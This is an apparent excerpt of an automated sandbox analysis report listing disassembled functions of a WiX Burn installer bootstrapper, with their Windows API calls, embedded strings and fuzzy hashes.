Instruction Fuzzy Hash: 02719071A41259EFDB11DF95CA41EFE7BB8EB85B20F10416AFA04EB250D334DE009BA1

Function 0099F210 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 183registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D3AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 009D3B3E

RegCloseKey.ADVAPI32(00000000,?,009E0D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 0099F440

Part of subcall function 009D14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0099F28D,009E0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 009D14BB

Strings

Resume, xrefs: 0099F282
"%ls" /%ls, xrefs: 0099F2E5
Failed to create run key., xrefs: 0099F31D
burn.runonce, xrefs: 0099F2DA
Failed to format resume command line for RunOnce., xrefs: 0099F2F9
Failed to delete run key value., xrefs: 0099F3CE
Failed to delete resume command line value., xrefs: 0099F41C
Failed to write run key value., xrefs: 0099F33B
Installed, xrefs: 0099F2A5
Failed to write Resume value., xrefs: 0099F293
Failed to write resume command line value., xrefs: 0099F35D
BundleResumeCommandLine, xrefs: 0099F348, 0099F3DB
Failed to write Installed value., xrefs: 0099F2B6
registration.cpp, xrefs: 0099F3C4, 0099F412

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseValueVersion
String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
API String ID: 2348918689-2631711097
Opcode ID: a93bcf7e913030be6c64a4008a429fba65df7fd82512becebe2c5ba999f0748c
Instruction ID: 8d330abcfb5f13098e5728d7403a67a8be41050258a85e7d6e3af6d3f1c5bed8
Opcode Fuzzy Hash: a93bcf7e913030be6c64a4008a429fba65df7fd82512becebe2c5ba999f0748c
Instruction Fuzzy Hash: 1F511532D8036AFBCF229EA9CC16BAEF768AB80754F154535F900F6161D7B49D5097C0

Function 009BCC91 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 174processCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(75568FB0,00000002,00000000), ref: 009BCC9D

Part of subcall function 009A4D8D: UuidCreate.RPCRT4(?), ref: 009A4DC0

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,009B2401,?,?,00000000,?,?,?), ref: 009BCD7B
GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 009BCD85
GetProcessId.KERNEL32(009B2401,?,?,00000000,?,?,?,?), ref: 009BCDBD

Part of subcall function 009A54DC: lstrlenW.KERNEL32(?,?,00000000,?,009DB500,?,00000000,?,0099452F,?,009DB500), ref: 009A54FD
Part of subcall function 009A54DC: GetCurrentProcessId.KERNEL32(?,0099452F,?,009DB500), ref: 009A5508
Part of subcall function 009A54DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0099452F,?,009DB500), ref: 009A553F
Part of subcall function 009A54DC: ConnectNamedPipe.KERNEL32(?,00000000,?,0099452F,?,009DB500), ref: 009A5554
Part of subcall function 009A54DC: GetLastError.KERNEL32(?,0099452F,?,009DB500), ref: 009A555E
Part of subcall function 009A54DC: Sleep.KERNEL32(00000064,?,0099452F,?,009DB500), ref: 009A5593
Part of subcall function 009A54DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0099452F,?,009DB500), ref: 009A55B6
Part of subcall function 009A54DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0099452F,?,009DB500), ref: 009A55D1
Part of subcall function 009A54DC: WriteFile.KERNEL32(?,0099452F,009DB500,00000000,00000000,?,0099452F,?,009DB500), ref: 009A55EC
Part of subcall function 009A54DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0099452F,?,009DB500), ref: 009A5607

Part of subcall function 009D0A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00994F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 009D0A38
Part of subcall function 009D0A28: GetLastError.KERNEL32(?,?,00994F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 009D0A46

CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,009BCBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 009BCE41
CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,009BCBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 009BCE50
CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,009BCBEF,?,?,?,?,?,00000000,?,?,?), ref: 009BCE67

Strings

Failed to wait for embedded process to connect to pipe., xrefs: 009BCDDF
Failed to allocate embedded command., xrefs: 009BCD54
Failed to create embedded pipe name and client token., xrefs: 009BCD00
burn.embedded, xrefs: 009BCD38
%ls -%ls %ls %ls %u, xrefs: 009BCD40
embedded.cpp, xrefs: 009BCDA6
Failed to create embedded process at path: %ls, xrefs: 009BCDB3
Failed to wait for embedded executable: %ls, xrefs: 009BCE24
Failed to create embedded pipe., xrefs: 009BCD27
Failed to process messages from embedded message., xrefs: 009BCE04

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
API String ID: 875070380-3803182736
Opcode ID: e444afb1bc445f501923c2034eb4cb57bcbed8b49dd973c60f51ed6df9d90db3
Instruction ID: cbef25faa11439b0340b1cbbd0d77abca369e9d27892626d360552fa5c421e02
Opcode Fuzzy Hash: e444afb1bc445f501923c2034eb4cb57bcbed8b49dd973c60f51ed6df9d90db3
Instruction Fuzzy Hash: A8518072D4122DFBDF119B94DD06BEEBBB8AF88721F114122FA00B6191D7709A409BD0

Function 0099ECBE Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 173COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0099EE4C

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

SysFreeString.OLEAUT32(?), ref: 0099EE04

Strings

Failed to allocate memory for software tag structs., xrefs: 0099ED4B
Failed to get @Filename., xrefs: 0099EEA9
Failed to get software tag count., xrefs: 0099ED13
Failed to get SoftwareTag text., xrefs: 0099EE8B
Failed to get @Path., xrefs: 0099EE95
SoftwareTag, xrefs: 0099ECCD
Failed to get @Regid., xrefs: 0099EE9F
Failed to get next node., xrefs: 0099EEB3
Path, xrefs: 0099EDB2
Failed to convert SoftwareTag text to UTF-8, xrefs: 0099EE81
`5w, xrefs: 0099EE04, 0099EE4C
Filename, xrefs: 0099ED7F
Regid, xrefs: 0099ED9A
registration.cpp, xrefs: 0099ED41
Failed to select software tag nodes., xrefs: 0099ECEE

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`5w$registration.cpp
API String ID: 336948655-3801564253
Opcode ID: 0fc6e0814d69dd671cef9d6069b9492fde1d2ee1a8f0b2130fb93d6f681c30db
Instruction ID: b3ad6f16d4b0d4a7af4000f964822082f62b27738004b9aa26904e1eaa86db29
Opcode Fuzzy Hash: 0fc6e0814d69dd671cef9d6069b9492fde1d2ee1a8f0b2130fb93d6f681c30db
Instruction Fuzzy Hash: D451A135E4172AFBCF11DF9DC881EAEB7A8BF44714B1085A9F901AB241DB70DE009790

Function 009D7F7E Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,009D8468,00000001,?), ref: 009D7F9E
CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,009D8468,00000001,?), ref: 009D7FB9
CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,009D8468,00000001,?), ref: 009D7FD4
CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,009D8468,00000001,?), ref: 009D8040
CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,009D8468,00000001,?), ref: 009D8064
CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,009D8468,00000001,?), ref: 009D8088
CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,009D8468,00000001,?), ref: 009D80A8
lstrlenW.KERNEL32(006C0064,?,009D8468,00000001,?), ref: 009D80C3

Strings

sha256, xrefs: 009D809F
http://appsyndication.org/2006/appsyn, xrefs: 009D7F91
name, xrefs: 009D7FCB
msi.dll, xrefs: 009D7F98
sha1, xrefs: 009D807F
apuputil.cpp, xrefs: 009D80DB
algorithm, xrefs: 009D8037
md5, xrefs: 009D805B
digest, xrefs: 009D7FB0

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
API String ID: 1657112622-2492263259
Opcode ID: 5be97d9714b92c4f1b00c53474e9ae9cf6d5bb8a3f1424ff38e78814dbb22272
Instruction ID: 6b41ced92744d5619315a58326ca919c6a1f9c6ed80cbf1bfed02e0c090c4903
Opcode Fuzzy Hash: 5be97d9714b92c4f1b00c53474e9ae9cf6d5bb8a3f1424ff38e78814dbb22272
Instruction Fuzzy Hash: C05195316CD312BBDB205F54CC45F66BB65AB15B30F208716F634AE3D2CBA5E8548790

Function 0099A03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0099A0B6

Strings

Failed to get product info., xrefs: 0099A1E3
Failed to format GUID string., xrefs: 0099A0C1
Failed to enumerate related products for upgrade code., xrefs: 0099A0F1
Trying per-user extended info for property '%ls' for product: %ls, xrefs: 0099A175
Failed to change value type., xrefs: 0099A21D
Unsupported product search type: %u, xrefs: 0099A07E
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0099A24F
VersionString, xrefs: 0099A0A6, 0099A131, 0099A147, 0099A15B, 0099A174, 0099A188
AssignmentType, xrefs: 0099A091
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 0099A148
State, xrefs: 0099A098
Product or related product not found: %ls, xrefs: 0099A1A1
Failed to copy upgrade code., xrefs: 0099A116
Language, xrefs: 0099A09F
Failed to set variable., xrefs: 0099A23C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16
String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2134270738
Opcode ID: 941277cff02974d2dfcdee88b6a1619135ee5339b79ca0724ac67a96f3f09f72
Instruction ID: 7b6685b32ce84569d5ef2b16cbebce86582aeac68b283bf862eb0aa62b391a32
Opcode Fuzzy Hash: 941277cff02974d2dfcdee88b6a1619135ee5339b79ca0724ac67a96f3f09f72
Instruction Fuzzy Hash: D061B432D84118BBCF21ABACCD45EAE7BB9EB85714F208156F914BB251C636DE0097D2

Function 009A4B2A Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 158sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 009A4B84
GetLastError.KERNEL32 ref: 009A4B92
Sleep.KERNEL32(00000064), ref: 009A4BB6

Strings

\\.\pipe\%ls.Cache, xrefs: 009A4C17
feclient.dll, xrefs: 009A4BE9, 009A4C84, 009A4C98, 009A4CDC
pipe.cpp, xrefs: 009A4BCF, 009A4CD2
Failed to open parent pipe: %ls, xrefs: 009A4BDC
Failed to allocate name of parent pipe., xrefs: 009A4B50
Failed to verify parent pipe: %ls, xrefs: 009A4BFE
Failed to open companion process with PID: %u, xrefs: 009A4CDE
\\.\pipe\%ls, xrefs: 009A4B3C
Failed to allocate name of parent cache pipe., xrefs: 009A4C2B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorFileLastSleep
String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
API String ID: 408151869-3212458075
Opcode ID: 786c0381c000e8a30420515f5617be4e5015d5a038c45e154da0dc14c277e774
Instruction ID: 7f20c2f0bb42ffdc87013a9b4ff8e4db1be74f95de66e92f8807ec3f87d385b2
Opcode Fuzzy Hash: 786c0381c000e8a30420515f5617be4e5015d5a038c45e154da0dc14c277e774
Instruction Fuzzy Hash: 68416136D86635FBDB2156D18D06F9D7668AF82B34F120221FE04BB290D7F5DD0095E4

Function 0099F585 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,009A04DF,InstallerVersion,InstallerVersion,00000000,009A04DF,InstallerName,InstallerName,00000000,009A04DF,Date,InstalledDate,00000000,009A04DF,LogonUser), ref: 0099F733

Part of subcall function 009D14F4: RegSetValueExW.ADVAPI32(00020006,009E0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0099F335,00000000,?,00020006), ref: 009D1527

Strings

InstallerVersion, xrefs: 0099F701, 0099F706, 0099F707, 0099F717
InstalledDate, xrefs: 0099F6C4, 0099F6DD
PackageName, xrefs: 0099F5FF, 0099F612
Failed to write %ls value., xrefs: 0099F71C
ThisVersionInstalled, xrefs: 0099F5DF, 0099F5F2
Failed to create the key for update registration., xrefs: 0099F5D3
Failed to get the formatted key path for update registration., xrefs: 0099F5A7
ReleaseType, xrefs: 0099F68A, 0099F68F, 0099F69E
PublishingGroup, xrefs: 0099F667, 0099F67A
Date, xrefs: 0099F6C9
Publisher, xrefs: 0099F63F, 0099F652
PackageVersion, xrefs: 0099F61F, 0099F632
InstalledBy, xrefs: 0099F6A4, 0099F6BD
InstallerName, xrefs: 0099F6E4, 0099F6E9, 0099F6EA, 0099F6FA
LogonUser, xrefs: 0099F6A9

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseValue
String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
API String ID: 3132538880-2703781546
Opcode ID: d4e298d7fbbd728f7ee7b8d53d02583fab1f2d0a0588df3f53d5b881e4719477
Instruction ID: da2b1967d60a2782c082bd0192bd135fe004822ed0b345418aed39af12a59369
Opcode Fuzzy Hash: d4e298d7fbbd728f7ee7b8d53d02583fab1f2d0a0588df3f53d5b881e4719477
Instruction Fuzzy Hash: 9941EB32E847A9F7CF239699CC12FAEBA699B90714F154171F900F6362CB719F10E680

Function 009AE7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 009AE7FF
RegisterClassW.USER32(?), ref: 009AE82B
GetLastError.KERNEL32 ref: 009AE836
CreateWindowExW.USER32(00000080,009E9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 009AE89D
GetLastError.KERNEL32 ref: 009AE8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 009AE945

Strings

Failed to create window., xrefs: 009AE8D5
Failed to register window., xrefs: 009AE864
Unexpected return value from message pump., xrefs: 009AE930
uithread.cpp, xrefs: 009AE85A, 009AE8CB
WixBurnMessageWindow, xrefs: 009AE824, 009AE940

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 5df9a05a3cf849498f07dd5490226b7b3b0098b303479600d1909d57a0287e0a
Instruction ID: 75f13ba23834a4e3c9307396613c6f1bc289c87f552d35ba2b1a00f3387960dc
Opcode Fuzzy Hash: 5df9a05a3cf849498f07dd5490226b7b3b0098b303479600d1909d57a0287e0a
Instruction Fuzzy Hash: CF41A272941225EBDB219BA5DC48BDEBFB8EF09760F11412AF914BA280D7349D409BE0

Function 009BC774 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON

Download Yara Rule

Strings

Failed to copy cache id for passthrough pseudo bundle., xrefs: 009BCA05
Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 009BC7B4
Failed to recreate command-line arguments., xrefs: 009BCA43
Failed to copy key for passthrough pseudo bundle., xrefs: 009BC988
Failed to copy uninstall arguments for passthrough bundle package, xrefs: 009BCAAC
Failed to copy local source path for passthrough pseudo bundle., xrefs: 009BC9B7
Failed to copy related arguments for passthrough bundle package, xrefs: 009BCA82
Failed to copy key for passthrough pseudo bundle payload., xrefs: 009BC9C5
Failed to copy install arguments for passthrough bundle package, xrefs: 009BCA62
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 009BC9E7
pseudobundle.cpp, xrefs: 009BC7A8, 009BC9A1, 009BC9DB
Failed to allocate memory for pseudo bundle payload hash., xrefs: 009BC9AD
Failed to copy download source for passthrough pseudo bundle., xrefs: 009BC98F
Failed to copy filename for passthrough pseudo bundle., xrefs: 009BC9BE

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
API String ID: 1357844191-115096447
Opcode ID: deabbd2685d2b738793710737eb635df3bb7adece65860842555dc994bcf3926
Instruction ID: fdfe48156277e55af20876a78bd230215f65450e1e3a3f43bc861ef0401c0a7e
Opcode Fuzzy Hash: deabbd2685d2b738793710737eb635df3bb7adece65860842555dc994bcf3926
Instruction Fuzzy Hash: C3B16C75A0061AEFDB11CF28C981F96BBA5FF88724F118165FD14AB351CB31E821DB80

Function 009BDE46 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 204stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 009BDE61

Strings

Failed to download BITS job., xrefs: 009BDFF8
Failed while waiting for BITS download., xrefs: 009BE012
Failed to set credentials for BITS job., xrefs: 009BDF0F
Failed to set callback interface for BITS job., xrefs: 009BDF99
Failed to add file to BITS job., xrefs: 009BDF2E
Failed to copy download URL., xrefs: 009BDEA8
Failed to create BITS job callback., xrefs: 009BDF74
bitsengine.cpp, xrefs: 009BDE77, 009BDF6A
Failed to complete BITS job., xrefs: 009BE00B
Invalid BITS engine URL: %ls, xrefs: 009BDE83
Failed to create BITS job., xrefs: 009BDEF0
Falied to start BITS job., xrefs: 009BE019
Failed to initialize BITS job callback., xrefs: 009BDF82

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen
String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
API String ID: 1659193697-2382896028
Opcode ID: 521a6459da5a2f4c7aa0451d9372666c564cb75134dc241386ba6a2c456c561b
Instruction ID: c51ca8ab8b95fc2d214a9b987a3372ad1e59049342120536dd8a5f968ebd95b8
Opcode Fuzzy Hash: 521a6459da5a2f4c7aa0451d9372666c564cb75134dc241386ba6a2c456c561b
Instruction Fuzzy Hash: CB612931909229EBCB11AF94CA85EEE7BBCEF98730B114156FD04AF251E7B5DD009B80

Function 0099BC93 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 190processCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0099BCE5
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0099BDF2
GetLastError.KERNEL32(?,?,?,?), ref: 0099BDFC
WaitForInputIdle.USER32(?,?), ref: 0099BE50
CloseHandle.KERNEL32(?,?,?), ref: 0099BE9B
CloseHandle.KERNEL32(?,?,?), ref: 0099BEA8

Strings

approvedexe.cpp, xrefs: 0099BE20
Failed to format argument string., xrefs: 0099BCF0
"%ls" %s, xrefs: 0099BD0B, 0099BD4C
Failed to format obfuscated argument string., xrefs: 0099BD3C
Failed to create obfuscated executable command., xrefs: 0099BD90
"%ls", xrefs: 0099BD62, 0099BD7C
D, xrefs: 0099BDD1
Failed to CreateProcess on path: %ls, xrefs: 0099BE2D
Failed to create executable command., xrefs: 0099BD1F

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
API String ID: 155678114-2737401750
Opcode ID: aa75fca8fd1d840cd60b84b3e8696deb3ffb332244ad7aa74a999d02948d411f
